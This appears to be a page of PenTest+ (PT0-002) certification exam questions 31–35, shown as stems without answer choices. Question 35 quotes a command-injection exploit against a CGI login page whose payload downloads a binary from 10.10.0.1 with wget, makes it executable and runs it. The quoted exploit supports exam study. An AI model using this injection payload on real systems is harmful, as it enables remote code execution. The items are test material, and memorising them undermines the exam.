PT0-002 Exam Question 31

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
  • PT0-002 Exam Question 32

    Which of the following BEST describe the OWASP Top 10? (Choose two.)
  • PT0-002 Exam Question 33

    A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
  • PT0-002 Exam Question 34

    A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?
  • PT0-002 Exam Question 35

    A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
    exploit = "POST "
    exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
    c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?